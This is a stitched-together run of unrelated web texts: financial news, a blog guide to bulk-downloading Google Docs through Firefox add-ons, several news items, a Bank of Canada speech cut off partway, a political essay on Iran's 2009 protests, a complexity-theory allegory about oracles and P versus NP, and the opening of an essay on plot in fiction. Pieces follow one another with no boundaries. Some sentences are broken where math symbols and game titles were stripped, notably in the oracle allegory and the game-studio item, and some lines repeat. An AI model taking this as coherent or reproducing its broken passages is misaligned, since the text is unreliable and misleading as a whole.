Mr Draaisma , who called the top of the bull market almost to the day in mid-2007 , has crunched the worldwide data on 19 major stock market crashes over the last century .
They show that the typical rebound rally ( as opposed to bear trap rallies , when markets later plunge to new lows ) lasts 17 months and stocks rise 71 pc .
The 1993 rally in the US was 170 pc over 13 months .
Finland 's rally in 1994 was 295 pc. Hong Kong rallied 159 pc in 2000 .
This rebound is only five months old .
The key indexes have risen 49 pc in the US and 42 pc in Europe .
Mr Draaisma advises clients to stay in the stocks for now , but stick to telecom companies , utilities , and oil .
Taking for granted that Google will always be there might be a huge mistake .
I ’ve never lost any critical files myself ( knock on wood ) .
Lost a couple emails , maybe some MP3s , sure .
But I ’ve worked in the IT industry long enough and have had enough users whine to me about losing data to know that it ’s common and it ’s a major problem .
The thing is , we usually only have ourselves to blame .
As Google rolls on with their Earth domination plans , many of us are becoming more and more reliant on their online services .
We at Matador use Google Docs to store articles and to collaborate with other writers and editors .
We ca n’t rely on Google to keep our documents safe .
It ’s up to us .
But what would happen if Google just up and died ?
However unlikely that is to happen , it ’s very possible .
They do n’t have an unblemished record .
How about Gmail going down for two hours back in February ?
And this recent news item : “ Google suffers major failure ” ?
If you ’re a heavy Google Apps user , your eyebrows better be raised right now .
So what do I do ?
We ca n’t rely on Google to keep our documents safe .
It ’s up to us .
We need to get a copy of all those files onto our local hard drives and into our control .
LifeHacker has some great tips in downloading Google data .
I ’m gonna share with you the method I used to get my Google Docs down to my computer .
It ’s true you can save each file , one - by - one , but unless you have a lot of time on your hands or love monotonous work , you ’ll prefer to do it all in one go .
This may seem lengthy , but after the initial setup , each backup after will be a two minute job .
First off , get on the Firefox bandwagon
Firefox has some wicked and useful plugins , such as the ones we ’re about to install .
So , I ’ll give you five minutes to download and install Firefox ….. okay .
Done ?
Let ’s go .
Install the GreaseMonkey plugin
1 . You can do this right at the Firefox GreaseMonkey plugin page
2. Click Add to Firefox , then Install .
Restart the browser and you should now see a cute lil monkey face in the bottom right corner .
Next , install Google Doc Download ( a GreaseMonkey script )
1. Visit the Google Doc Download page
2. Click the Install Now ! link , then Install
3 . After restarting Google Docs , you ’ll notice a new option — Download Your Documents — in your Google Docs control panel :
Not done yet .
We need to be able to download all the documents in one fell swoop .
Keep reading …
Last , install the DownThemAll !
plugin
1. Go to the DownThemAll ! plugin page and click Add to Firefox , then Install .
2. Restart Firefox .
That easy .
Now the cool bit
You ’re now ready to back up your Google Docs .
If not already , log into Google Docs .
1. Click on All Items to display all documents .
2 . Near the bottom , click on Select All so that all your documents are highlighted .
3 . Click that shiny new option I mentioned earlier — Download Your Documents — and choose as Microsoft Office Files .
4 . A new tab will open up titled Google Docs & Spreadsheets Downloads and will list of all your documents .
In Firefox , click Tools > DownThemAll !
Tools > DownThemAll !
5 . Choose your destination folder in the Save files in part and then click Start !
Now watch in wonder as all of your docs get downloaded into Microsoft Office files .
One last step
This is optional , but since computers are known to crash , a good idea .
Now that you have all your docs on your computer , back them up to another medium such as CD , DVD , external hard drive or USB memory stick for safe keeping .
Since this is not an automatic backup process , you ’ll have to make it a habit to manually do this every now and again .
Obviously , the more often the better , but once is better than none .
COMMUNITY CONNECTION
Do you have any horror stories of losing precious documents ?
Or more tips on safeguarding our data ?
Please share below !
PICKENSVILLE -- Authorities in Pickens County , Alabama , are trying to track a pack of wild dogs they believe may have killed a 96 - year - old man and consumed his remains .
Israel Pope Jr. was reported missing Monday night and police found his remains in a field on his property , about a quarter of a mile from his house .
Pickens County Sheriff David Abston said all they found were bones .
He said Pope had been consumed by a pack of dogs authorities tracked to a den under an abandoned mobile home .
Investigators found pieces of Pope 's clothing and what may have been human remains at the mobile home .
He said it was unclear whether the dogs killed Pope , or whether they found his body in the field and consumed it .
Aug 25 ( Reuters ) - Bank of Canada Deputy Governor Timothy Lane is scheduled to speak about the outlook for the Canadian economy on Tuesday at 1:00 p.m. Eastern ( 1700 GMT ) .
Here is the text of the speech , to be delivered in Kingston , Ontario .
“ Good afternoon .
It ’s a great pleasure to join you at this year ’s CABE meeting .
The theme of the conference , “ managing the recovery , ” is particularly timely :
As we move past the gravest dangers of the financial crisis toward better days , attention has turned to the policy challenges posed by the recovery .
“ Managing the recovery ” may turn out to be almost as interesting as managing during the crisis !
While the outlook is clouded by uncertainty , there are encouraging signs that we will return to positive growth this quarter .
Stimulative monetary and fiscal policies , improved financial conditions , firmer commodity prices , and a rebound in business and consumer confidence are spurring the growth of domestic demand .
Globally , the vigorous policy actions taken by monetary and fiscal authorities appear to have reduced the probability of an extreme negative outcome for the global economy .
But there remain significant upside and downside risks to the outlook for the Canadian economy .
As we return to positive growth , policy - makers are facing difficult decisions when and how to remove stimulus , how to secure the stability of the global financial system , and , importantly , and over the long term , how to set the stage for a return to rising living standards .
It is this last challenge that I ’d like to focus on later in my remarks .
I will start with a few comments on how the recovery is likely to unfold and the forces that will be driving it , and what this outlook means in terms of the output gap .
Then I ’d like to look at Canada ’s growth trajectory beyond the recovery by focusing on two key variables that affect both potential and actual output labour input and productivity .
Given the significant changes foreseen in the labour market and their implications for output , it ’s clear that Canada , like many other nations , needs to improve its productivity if we are to reap the benefits of sustained growth .
I ’ll also touch on the important role of monetary policy and financial system policy in setting the stage for sustainable growth .
After I conclude , I ’d be happy to respond to comments and questions .
The outlook for the economy The Canadian economy is expected to start growing again this quarter .
Our July Monetary Policy Report discusses the factors underpinning this earlier - than - expected resumption of growth .
Globally , there are signs of a nascent recovery .
More specifically , the U.S. economy is likely to start recovering this quarter , and growth is also picking up again in China , a major source of demand for raw materials .
In Canada , domestic demand is strengthening , supported by improved financial conditions , a rebound in consumer and business confidence , and firmer commodity prices .
We are projecting Canada ’s GDP growth at - 2.3 per cent for 2009 , 3.0 per cent for 2010 , and 3.5 per cent for 2011 .
Canada ’s economic recovery will be supported by a combination of factors , which is likely to make it somewhat more robust than elsewhere .
First , the composition of economic activity in the United States as it recovers will prove favourable to Canadian exporters as the sectors hit hardest by the recession , such as housing and automobiles , rebound .
Second , Canada ’s relatively well - functioning financial system will enable credit to meet the needs of an expanding economy .
A third supportive factor is the underlying strength of household , business , and government balance sheets .
These favourable circumstances are expected to support the return to economic growth , with the output gap closing by mid-2011 .
Of course , many uncertainties remain and economic forecasters are notoriously more prone to error around turning points in the cycle .
The July MPR identifies the upside risk of economic momentum in Canada being stronger and more sustained than expected .
On the downside , the risks relate mainly to the external sector .
There is a possibility that financial conditions may normalize more slowly than expected , and further setbacks cannot be precluded .
Two downside risks require elaboration .
First , it ’s important to bear in mind that a good deal of the impetus for the recovery , in Canada and worldwide , is coming from the public sector from policy actions by governments and central banks .
The scale of fiscal expansion has been quite substantial .
Monetary policy has also been eased aggressively , bringing policy interest rates close to their effective lower bound in most advanced economies .
In Canada , the target overnight rate of 1 / 4 per cent is reinforced by our conditional commitment to keep the rate at its current level until the middle of next year .
This monetary easing counters other factors such as tighter lending conditions and wider - than - usual yield spreads on corporate bonds that would otherwise have resulted in tighter overall financial conditions .
Other central banks , given the situations they have been facing , have gone even further by providing additional stimulus through quantitative and / or credit easing .
In many countries , the authorities have also had to provide substantial direct support to financial institutions facing difficulties .
Although we have been spared that in Canada , this support has been an important bolster for the global recovery .
While these policy actions have been timely and effective , they imply that the incipient recovery depends to a considerable degree on official action .
At what stage will private demand be robust enough to make the recovery self - sustaining ?
Clearly , we have n’t reached that point yet .
Ravage used to transform from a cat into a cassette , but those weird , tapey things are a little old for fans of the bold , new , LeBouf 'd version of the franchise .
How about a USB drive ?
Advertisement
In flash drive form , he 's neither terribly compact nor inconspicuous , but this toy is n't meant to be a great Transformer — it 's about proudly hanging a physical manifestation of your awkward fandom out of the side of your laptop .
The Ravage drive will run a steep $ 43 , and ship in September .
[ NerdApproved via OhGizmo ]
developer Arkane Studios is working with 2 K Marin on the upcoming , the independent French - headquartered studio revealed on its website Including 2 K Marin itself , the primary developer on the game , Arkane is the fourth studio known to be contributing to the sequel ; 2 K Australia is co-developing the game , as it did with 2 K Boston for the original , and Digital Extremes is handling the multiplayer component .
Specifically , Arkane , which has its headquarters in Lyon , France and a satellite studio in Austin , Texas , is said to be collaborating " in the areas of design , animation , and art . "
A statement on the company 's website indicated : " We 're excited about this game , which underscores Arkane Studios ' core values . " producer Alyssa Finley of 2 K Marin also commented on the partnership : " In the past we 've been working closely with 2 K Australia for our tech needs and Digital Extremes for our robust multiplayer experience .
Today I 'm proud to say that we 've added another important developer to the mix .
" " Under the direction and leadership of 2 K Marin , Arkane is assisting in the creation of levels that embody the aesthetic and gameplay ideals that makesuch a unique and exciting experience .
" Arkane 's design roots are not dissimilar to those of .
The originalwas to a great extent born out of the lineage of Looking Glass Studios ' and 2 K Boston 's ( nee Irrational Games ) own .
Arkane has always cited Looking Glass ' first - person works as primary influences , and itsandhave been first - person genre - blending games as well .is planned to release this fall for PC , Xbox 360 , and PlayStation 3 .
The Royal Canadian Mounted Police has been asked to look into how $ 19 million of gold bullion came to be unaccounted for at the national mint .
It was discovered last October that 17,500 troy ounces of gold appeared to be missing at the mint in Ottawa .
At that time , the Royal Canadian Mint arranged for an independent review by the accounting firmDeloitte & Touche .
The mint issued a statement Monday saying the discrepancy “ does not appear to relate to an accounting error in the reconciliation process , an accounting error in the physical stock count schedules or an accounting error in the record keeping of transactions during the year ” …
In a joint statement Monday night , Transport Minister John Baird and Minister of State for Transport Rob Merrifield were scornful .
“ The mint ’s still unexplained loss of precious metals is inexcusable , ” the statement said .
“ The mint will be held accountable . ”
The government said the mint will be required to report on inventory of all precious metals on a quarterly basis .
Additionally , all bonuses payable to executives are being withheld until the investigation is completed .
How the frack do you not manage to notice that $ 19 million in gold has gone missing ?
This comic opera routine has been going on long enough for Sarah Palin to give birth one more time .
Does anyone check who ’s walking out the door with what ?
Be prepared for a barrage of commercials from pharmaceutical manufacturers telling you what a " tremendous deal " the health care reform package is .
Clearly reform is a " tremendous deal " for them , otherwise they would not be pushing it so hard .
Please consider Drugmakers Consider Ad Campaign on Health Overhaul .
Drugmakers are considering a $ 100 million advertising campaign starting as early as September to push legislation that would overhaul the health care system , said a person familiar with the discussion .
The Pharmaceutical Research and Manufacturers of America , the industry ’s lobbying group , discussed funding the ad campaign during a meeting in Washington last week , the person said .
PhRMA spokesman Ken Johnson said no decision has been reached on the group ’s campaign strategy for when Congress reconvenes after the August recess .
PhRMA will be running television commercials in August promoting the importance of the drug industry on the economy in states where pharmaceutical companies have operations , Johnson said .
PhRMA said they support measures to revamp the health care system and will contribute $ 80 billion over 10 years to lowering drug costs .
They also stand ready to oppose legislation that would allow the government to directly negotiate prices on medicines sold through the prescription drug program of Medicare , the government ’s health plan for the elderly and disabled .
Two people familiar with the discussions in Washington said the amount of money put into ads could increase to $ 120 million .
$ 8 Billion a year for 10 Years
They also stand ready to oppose legislation that would allow the government to directly negotiate prices on medicines sold through the prescription drug program of Medicare , the government ’s health plan for the elderly and disabled .
Part 1 of the Series : Preparing to Start a Business Blog
In part 1 of this series , we examined why a business blog is important and how to build one .
After living in the space , deciding on a topic , and building your blog on your domain , it 's now time to actually start writing posts and publishing them for everyone to read .
How Often and How Much Should You Post ?
One of the first concerns that many of our clients have about posting a blog is the " time factor . "
They 're scared that blogging will be too much of a time commitment and they do n't have sufficient resources to posting thoughtful content .
This is a valid concern and I always appreciate people not wanting to get in over their heads , but blogging is n't really as much of a time commitment as many people fear .
Our general rule of thumb is that you should write at least one post every seven days .
This guideline can differ based on what you 're truly trying to accomplish with your blog ( for example , we post daily , as this blog is one of our main marketing efforts ) , but we think once a week is a good baseline to start with .
A post every seven days ensures that your site is frequently updated with fresh content , and you also acclimate prospects to the idea that you 're dedicated to your business and generating quality content on a regular basis .
Furthermore , your posts do n't have to be the quality or length of Moby Dick - we generally recommend making sure each post is between 300 and 700 words .
It 's fine to occasionally have a shorter summary post or a longer thought - leading post , but people are generally coming to your blog to be informed quickly , so 300 - 700 words ensures you generate good content while not alienating readers with your verbosity .
What Should You Post ?
One way to help ease the time burden associated with the weekly posts it to repurpose content you 've previously written and turn it into posts .
Some good sources of content are :
Emails to clients and colleagues .
Did a client or colleague write you an intriguing email that prompted you to write a thorough and thoughtful response ?
Does it seem that this question comes up pretty often ?
Make some changes to the email to make it more generic and post it to your blog .
It will then serve as a permanent reference for the question in the future , and the poser of the question will likely be flattered that you deemed their question worthy of an entire blog post .
Previous Articles Written for Other Publications .
Have you been a guest columnist or blogger for another publication ?
There 's no reason that this content or similar content should n't also live on your site , especially if the original article only appeared in print form .
Make some changes to the column and post it to your blog , so people can always get access to the useful information from your site .
Summarize Important Industry News .
Was their big news relevant to your industry or your clients ' in the past week ?
Post a summary of the article ( be sure to link back to the source ! ) and how it affects you and your clients on your blog .
Clients will appreciate that you 've provided them with valuable information and were perhaps helpful in decoding a confusing news event and how it affects them .
By repurposing previous content , you can be sure that you did n't write that long email in vain or write a column for a rarely read publication , and you also cut down on the weekly time necessary to maintain your business 's blog .
So , while a blog is certainly an undertaking that you should n't take lightly , I think the overall committment is not nearly as intimidating as many people think .
By posting 300 - 700 words every week , you have the ability to infinitely expand your footprint on the web , increase inbound traffic , and gain thought leadership with your target .
Update :
Part 3 of the Series : How to Promote Your Blog Posts
By Mike Ely
June 19 , 2009 -- Kasama Project --
There is a self - deceptive politics ( among some leftists ) that seeks to prettify all kinds of reactionary forces that ( for one reason or another ) are in opposition to US imperialism — including Islamic reactionaries , Kim Jung Il , “ hardline ” revisionists of the Li Peng and Eric Honecker type and so on .
And in the process they have a real , almost startling , hostility toward sections of the people who rise up in important if still - inarticulate ways .
My sense is that such politics arise from a despair over actually developing our own revolutionary forces — and a resigned assumption that we have no other alternative but to fall behind any forces ( ugly , oppressive , reactionary or not ) who ( one way or another ) seem to be on the United States ' shit list .
This is not a uni-polar world with only one defining contradiction .
Yes , we understand ( and must understand ) that the US acts as a central pillar of world capitalism … but it is hardly the only pillar or the only reactionary force .
Opposition protest at Azadi Square , Tehran , June 15 , 2009 .
As someone who remembers this Iranian regime murdering our comrades and drenching the people in blood , it is hard not have a far more nuanced sense of such events .
I remember so vividly attending parties of celebration with our Iranian communist comrades , from the Iranian Student Association ( ISA ) at colleges in the US , as they went back to Iran ( in 1979 ) to dive into the revolution — so full of hopes and energy .
And I know now , with real sadness that has never gone away , that many of them ended up in the prisons and torture cells of Khomenei , or were wasted on the frontlines of the war with Iraq .
I suspect there is a whole generation of radical activists in the US who do n’t know how Iran ’s Islamic Republic murdered and tortured communists and leftists in large numbers after the 1979 revolution — to consolidate a very conservative - reactionary god-state .
And these victims included many who had based their politics ( naively ) on forming a “ united front against imperialism ” with those bloody mullahs - in - power .
The importance of revisiting such history is the importance of not repeating it — and not misunderstanding who the theocrats are , and what they are capable of .
And at a moment when they are exposed , hated , de-legitimised , targeted among the people themselves , overwhelmingly because of their own crimes , it would be terrible politics to rally to the Islamic theocrats defence simply because they are also being targeted by the United States and Israel externally .
In some ways , those external pressures are part of that “ perfect storm ” that may reawaken politics within Iran .
We have opposed ( and must seek to oppose much more powerfully ) the US imperialist threats against Iran — and its whole long - term push to fully dominate the central oil fields of the Middle East .
We know that the US and Israel will pursue their geopolitical strategies here .
And we must understand and oppose those moves .
In many ways the only hope the US has had for a “ victory ” in Iraq involved ( somehow ) causing a “ regime change ” in Iran .
In the corporate media , all the talk is about Israel ’s fear of nuclear weapons , but there is another more - unspoken issue : the Iraq war has long ago morphed into a US - Iranian power struggle over the control of Iraq ( and of this region ) .
And so for the US there are very high stakes in the eruptions in Iran .
More than one possible outcome
But our brains are capable of grasping more than one thread and dynamic at a time — it is not just possible ( but inevitable ) that great events draw into them the attentions of MANY and DIFFERENT players with many different interests .
The US hopes to have a pro-US government emerge from all of this .
We all know that .
They are intevening in countless ways — seen and unseen .
This is undoubtedly true .
But who says that a pro-US outcome is the only possibility ?
Who says this means that the current government should be supported ?
Who decided that the people of Iran have no agency , no hopes , no possibility of upsetting that whole table of “ choices ” ?
The world is full of very reactionary governments and forces who are in sharp hostility — but there is certainly no reason to believe that we ( or the people generally ) always just have to choose to side with one reactionary force over another .
Sometimes the clash of oppressive forces create great openings through which radical , secular and even revolutionary forces can emerge , learn , organise and act .
The politics of “ lesser evil ” is often a politics of lowered sights — a politics so despairing of the possibility of revolution that real , living , hairy , complex revolutionary possibilities do n’t even enter the thinking .
They are there , but you do n’t even see them .
In essense , this simplistic approach is an approach that pulls toward a cynical view of people , of their ability to learn and develop politics in complex situations , and which seems rooted in a rather strange attraction to any ugly force in the Third World that seems somehow “ hard line ” .
What kind of a world will that create ?
What kind of evaluation is that of the forces ( who are actually in the field ) ?
` Class understanding '?
Some have argued that supporting the people in Iran ’s streets lack a certain “ class understanding ” .
Presumably that is because the demonstrations in Iran have drawn in the urban middle class ( but not so many of Iran ’s working class and even less of the peasantry ) .
But is that how we understand class ?
If “ the workers ” support a US war and “ privileged college students ” oppose it — should we be confused by that ?
Is that kind of crude reductionist “ class analysis ” we want to uphold ?
If Iranian students and urban middle classes are the first to strike out against a brutal and theocratic regime , even if they bring their prejudices and illusions with them — is that so bad or unusual ?
History is packed with examples to discuss .
( Is the Chinese Revolution imaginable without the heavily urban , heavily educated intellectual movement the 1919 May Fourth Movement .
Were the trade union apparatuses automatically correct in the French May - June 1968 events ? )
It is a good thing when university students take to the streets against a repressive government ( with or without some workers ) .
It is a good thing when secular , urban youth and women march against a theocratic regime that enforces medieval morality , and the veil , and much more ( with or without some peasants ) .
It is a good thing when people find their voice in a society that stifled them .
And such openings are the path by which radical politics stirs even more widely — including precisely among the working people ( who are sometimes slower to move ) .
A class analysis has many components :
One is to approach the countless political questions of our world from the communist point of view of ending all oppression ( a view that ultimately is in the interest of those most oppressed and stripped of property ) .
It also looks at the actions of all class in terms of the revolutionary process .
And , finally , what is the “ class understanding ” in a view that seems to say we are limited to a choice between various capitalist and feudal forces , i.e. that the people of Iran are forced to pick between US or their own ugly , hated ruling class .
Is that a “ class analysis ” ?
Revolutions in real life
Someone said to me : “ People opposing these demonstrations have no sense of how revolutions unfold in real life . ”
I think there is a lot to this .
Often revolution emerges from cracks like this .
And revolutionary forces ( that will have a role in the future ) reach new audiences and forces in events like this .
And the forces who drag the people into political life — the Rafsanjanis and Moussavis of history — are n’t always the one who inherit the results .
Will forces within the Iranian establishment try to tame this movement with compromises ?
Yes .
Will they order that demands remain within frameworks of the current system ?
Yes .
Will they send marshals in green armbands into the mass marches to isolate and threaten the more radical , secular and revolutionary forces ?
Of course .
A great movement is not defined by those who “ called it into being ” .
It is not limited by the forces who officially or temporarily claim to lead it .
Its course is not set by those who try to control it .
And in all of this , we look for , we popularise the most radical , secular , revolutionary and intransigent forces who ultimately represent the best interests of the people .
In many ways , the people churn up their own interests and programs in great upheavals .
They congeal into organisations and trends that will influence a whole generation for decades .
They will form the kinds of verdicts ( in their own hearts and minds ) that forge “ a revolutionary people ” — for greater challenges and even more sophisticated actions in the future .
We have given up on that future if we were to adopt a narrow , shortsighted politics of always picking between this or that bourgeois player on the scene .
Kasama has just posted this from Reza Fiyouzat :
The Iranian people sensed a deep fracture within the ruling establishment – something that was clearly expressed in astonishing language and tone , in the televised - for - the - first time live debates between the candidates – and they have ceased their chance to use the divide between their rulers to their own advantage .
The people may have taken to the streets under the excuse of the elections , and may have been encouraged by the rhetoric of the ``reformist '' camp in favor of some breathing room in the suffocating political and cultural atmosphere imposed on them , but they have forced the debate further .
They are openly , and in millions across the country , questioning the legitimacy of the establishment , represented at the moment by Ahmadinejad .
The people , in short , have moved beyond Mousavi and the reformists , but are still willing to go along with the tactics formulated by reformist leaders ; for the moment .
This jibes with both my impression of these events , and my hopes for these events — though we will all learn over time the details of what is happening far below the visible screen .
But I do know this : if you look at Iran , any future hope for radical change lies among the people in the streets , not in the bloody military and religious forces running the government .
[ Mike Ely is a participant of the Kasama Project , which is seeking to reconceive and regroup a revolutionary movement within the United States .
This article first appeared on the Kasama Project 's website and has been posted at Links International Jourmal of Socialist Renewal with the author 's permission . ]
The most fundamental unsolved problem in complexity theory is undoubtedly the P=NP problem , which asks ( roughly speaking ) whether a problem which can be solved by a non-deterministic polynomial - time ( NP ) algorithm , can also be solved by a deterministic polynomial - time ( P ) algorithm .
The general belief is that , i.e. there exist problems which can be solved by non-deterministic polynomial - time algorithms but not by deterministic polynomial - time algorithms .
One reason why the question is so difficult to resolve is that a certain generalisation of this question has an affirmative answer in some cases , and a negative answer in other cases .
More precisely , if we give all the algorithms access to an oracle , then for one choice of this oracle , all the problems that are solvable by non-deterministic polynomial - time algorithms that calls ( ) , can also be solved by a deterministic polynomial - time algorithm algorithm that calls ( ) , thus ; but for another choice of this oracle , there exist problems solvable by non-deterministic polynomial - time algorithms that call , which cannot be solved by a deterministic polynomial - time algorithm that calls , thus .
One particular consequence of this result ( which is due to Baker , Gill , and Solovay ) is that there cannot be any relativisable proof of either or , where “ relativisable ” means that the proof would also work without any changes in the presence of an oracle .
The Baker - Gill - Solovay result was quite surprising , but the idea of the proof turns out to be rather simple .
To get an oracle such that , one basically sets to be a powerful simulator that can simulate non-deterministic machines ( and , furthermore , can also simulate itself ) ; it turns out that any PSPACE - complete oracle would suffice for this task .
To get an oracle for which , one has to be a bit sneakier , setting to be a query device for a sparse set of random ( or high - complexity ) strings , which are too complex to be guessed at by any deterministic polynomial - time algorithm .
Unfortunately , the simple idea of the proof can be obscured by various technical details ( e.g. using Turing machines to define and precisely ) , which require a certain amount of time to properly absorb .
To help myself try to understand this result better , I have decided to give a sort of “ allegory ” of the proof , based around a ( rather contrived ) story about various students trying to pass a multiple choice test , which avoids all the technical details but still conveys the basic ideas of the argument .
This allegory was primarily for my own benefit , but I thought it might also be of interest to some readers here ( and also has some tangential relation to the proto - polymath project of determinstically finding primes ) , so I reproduce it below .
— 1 . and students —
In this story , two students , named and ( and which for sake of grammar , I will arbitrarily assume to be male ) , are preparing for their final exam in a maths course , which will consist of a long , tedious sequence of multiple - choice questions , or more precisely true - false questions .
The exam has a reasonable but fixed time limit ( e.g. three hours ) , and unlimited scratch paper is available during the exam .
Students are allowed to bring one small index card into the exam .
Other than scratch paper , an index card , and a pencil , no other materials are allowed .
Students cannot leave questions blank ; they must answer each question true or false .
The professor for this course is dull and predictable ; everyone knows in advance the type of questions that will be on the final , the only issue being the precise numerical values that will be used in the actual questions .
For each student response to a question , there are three possible outcomes :
Correct answer .
The student answers the question correctly .
The student answers the question correctly .
False negative .
The student answers “ false ” , but the actual answer is “ true ” .
The student answers “ false ” , but the actual answer is “ true ” .
False positive .
The student answers “ true ” , but the actual answer is “ false ” .
We will assume a certain asymmetry in the grading : a few points are deducted for false negatives , but a large number of points are deducted for false positives .
( There are many real - life situations in which one type of error is considered less desirable than another ; for instance , when deciding on guilt in a capital crime , a false positive is generally considered a much worse mistake than a false negative . )
So , while students would naturally like to ace the exam by answering all questions correctly , they would tend to err on the side of caution and put down “ false ” when in doubt .
Student is hard working and careful , but unimaginative and with a poor memory .
His exam strategy is to put all the techniques needed to solve the exam problems on the index card , so that they can be applied by rote during the exam .
If the nature of the exam is such that can be guaranteed to ace it by this method , we say that the exam is in class .
For instance , if the exam will consist of verifying various multiplication problems ( e.g . “ Is ? ” ) , then this exam is in class , since can put the algorithm for long multiplication , together with a multiplication table , on the index card , and perform these computations during the exam .
A more non-trivial example of an exam in class would be an exam consisting solely of determining whether various large numbers are prime ; here could be guaranteed to ace the test by writing down on his index card the details of the AKS primality test .
Student is similar to , but is substantially less scrupulous ; he has bribed the proctor of the exam to supply him with a full solution key , containing not only the answers , but also the worked computations that lead to that answer ( when the answer is “ true ” ) .
The reason he has asked ( and paid ) for the latter is that he does not fully trust the proctor to give reliable answers , and is terrified of the impact to his grades if he makes a false positive .
Thus , if the answer key asserts that the answer to a question is “ true ” , he plans to check the computations given to the proctor himself before putting down “ true ” ; if he cannot follow these computations , and cannot work out the problem himself , he will play it safe and put down “ false ” instead .
We will say that the exam is in class if
is guaranteed to ace the exam if the information given to him by the proctor is reliable ;
is guaranteed to ace the exam if the information given to him by the proctor is reliable ; is guaranteed not to make a false positive , even if the proctor has given him unreliable information .
For instance , imagine an exam consisting of questions such as “ Is Fermat ’s last theorem provable in ten pages or less ? ” .
Such an exam is in the class , as the student can bribe the proctor to ask for a ten - page proof of FLT , if such exists , and then would check that proof carefully before putting down “ True ” .
This way , the student is guaranteed not to make a false positive ( which , in this context , would be a severe embarrassment to any reputable mathematician ) , and will ace the exam if the proctor actually does happen to have all the relevant proofs available .
It is clear that is always going to do at least as well as , since always has the option of ignoring whatever the proctor gives him , and copying ‘s strategy instead .
But how much of an advantage does have over ?
In particular , if we give a little bit more time ( and a somewhat larger index card ) , could every exam that is in class , also be in class ?
This , roughly speaking , is the problem .
It is believed that , thus there are exams which will ace ( with reliable information ) and will at least not make a false positive ( even with unreliable information ) , but for which is not guaranteed to ace , even with a little extra time and space .
— 2 . Oracles —
Now let ’s modify the exams a bit by allowing a limited amount of computer equipment in the exam .
In addition to the scratch paper , pencil , and index card , every student in the exam is now also given access to a computer which can perform a carefully limited set of tasks that are intended to assist the student .
Examples of tasks permitted by could include a scientific calculator , a mathematics package such as Matlab or SAGE , or access to Wikipedia or Google .
We say that an exam is in class if it can be guaranteed to be aced by if he has access to , and similarly the exam is in class if it can be guaranteed to be aced by if he has access to and the information obtained from the proctor was reliable , and if he is at least guaranteed not to make a false positive with access to if the information from the proctor turned out to be unreliable .
Again , it is clear that will have the advantage over , in the sense that every exam in class will also be in class .
( In other words , the proof that relativises . )
But what about the converse – is every exam in class , also in class ( if we give a little more time and space , and perhaps also a slightly larger and faster version of ) ?
We now give an example of a computer with the property that , i.e. that every exam in class , is also in class .
Here , is an extremely fast computer with reasonable amount of memory and a compiler for a general - purpose programming language , but with no additional capabilities .
( More precisely , should be a PSPACE - complete language , but let me gloss over the precise definition of this term here . )
Suppose that an exam is in class , thus will ace the exam if he can access and has reliable information , and will not give any false positive if he can access and has unreliable information .
We now claim that can also ace this exam , if given a little bit more time and a slightly larger version of .
The way he does it is to program his version of to simulate ‘s strategy , by looping through all possible values of the solution key that might be given , and also simulating ‘s copy of as well .
( The latter task is possible as long as ‘s version of is slightly larger and faster than ‘s version . )
There are of course an extremely large number of combinations of solution key to loop over ( for instance , consider how many possible proofs of Fermat ’s last theorem under ten pages there could be ) , but we assume that the computer is so fast that it can handle all these combinations without difficulty .
If at least one of the possible choices for a solution key causes the simulation of to answer “ true ” , then will answer “ true ” also ; if instead none of the solution keys cause to answer “ true ” , then will answer “ false ” instead .
If the exam is in class , it is then clear that will ace the exam .
Now we give an example of a computer with the property that , i.e. there exists an exam which is in class , but for which is not guaranteed to ace even with the assistance of .
The only software loaded on is a web browser , which can fetch any web page desired after typing in the correct URL .
However , rather than being connected to the internet , the browser can only access a local file system of pages .
Furthermore , there is no directory or search feature in this file system ; the only way to find a page is to type in its URL , and if you ca n’t guess the URL correctly , there is no way to access that page .
( In particular , there are no links between pages . )
Furthermore , to make matters worse , the URLs are not designed according to any simple scheme , but have in fact been generated randomly , by the following procedure .
For each positive integer , flip a coin .
If the coin is heads , then create a URL of random characters and place a web page at that URL .
Otherwise , if the coin is tails , do nothing .
Thus , for each , there will either be one web page with a URL of length , or there will be no web pages of this length ; but in the former case , the web page will have an address consisting of complete gibberish , and there will be no means to obtain this address other than by guessing .
The exam will consist of a long series of questions such as “ Is there a web page on with a URL of characters in length ? ” .
It is clear that this exam is in class .
Indeed , for to ace this exam , he just needs to bribe the proctor for the URLs of all the relevant web pages ( if they exist ) .
He can then confirm their existence by typing them into , and then answer “ true ” if he finds the page , and “ false ” otherwise .
It is clear that will ace the exam if the proctor information is reliable , and will avoid false positives otherwise .
On the other hand , poor will have no chance to ace this exam if the length of the URLs are long enough , for two reasons .
Firstly , the browser is useless to him : any URL he can guess will have almost no chance of being the correct one , and so the only thing he can generate on the browser is an endless stream of “ 404 Not Found ” messages .
( Indeed , these URLs are very likely to have a high Kolmogorov complexity , and thus can not be guessed by .
Admittedly , does have available , but one can show by induction on the number of queries that is useless to .
We also make the idealised assumption that side - channel attacks are not available . )
As is useless , the only hope has is to guess the sequence of coin flips that were used to determine the set of for which URLs exist of that length .
But the random sequence of coin flips is also likely to have high Kolmogorov complexity , and thus can not be guaranteed to be guessed by either .
Thus .
Remark 1
Note how the existence of long random strings could be used to make an oracle that separates from .
In the absence of oracles , it appears that separation of from is closely connected to the existence of long pseudorandom strings – strings of numbers which can be deterministically generated ( perhaps from a given seed ) in a reasonable amount of time , but are difficult to distinguish from genuinely random strings by any quick tests .
See my writeup of this lecture by Avi Wigderson for more discussion .
A good story is a dirty secret that we all share .
It 's what makes guilty pleasures so pleasurable , but it 's also what makes them so guilty .
A juicy tale reeks of crass commercialism and cheap thrills .
We crave such entertainments , but we despise them .
Plot makes perverts of us all .
It 's not easy to put your finger on what exactly is so disgraceful about our attachment to storyline .
Sure , it 's something to do with high and low and genres and the canon and such .
But what exactly ?
Part of the problem is that to find the reason you have to dig down a ways , down into the murky history of the novel .
There was once a reason for turning away from plot , but that rationale has outlived its usefulness .
If there 's a key to what the 21st - century novel is going to look like , this is it : the ongoing exoneration and rehabilitation of plot .
Where did this conspiracy come from in the first place — the plot against plot ?
I blame the Modernists .
Who were , I grant you , the single greatest crop of writers the novel has ever seen .
In the 1920s alone they gave us " The Age of Innocence , " " Ulysses , " " A Passage to India , " " Mrs. Dalloway , " " To the Lighthouse , " " Lady Chatterley 's Lover , " " The Sun Also Rises , " " A Farewell to Arms " and " The Sound and the Fury . "
Not to mention most of " In Search of Lost Time " and all of Kafka 's novels .
Pity the poor Pulitzer judge for 1926 , who had to choose between " The Professor 's House , " " The Great Gatsby , " " Arrowsmith " and " An American Tragedy . "
( It went to " Arrowsmith . " Sinclair Lewis prissily declined the prize . )
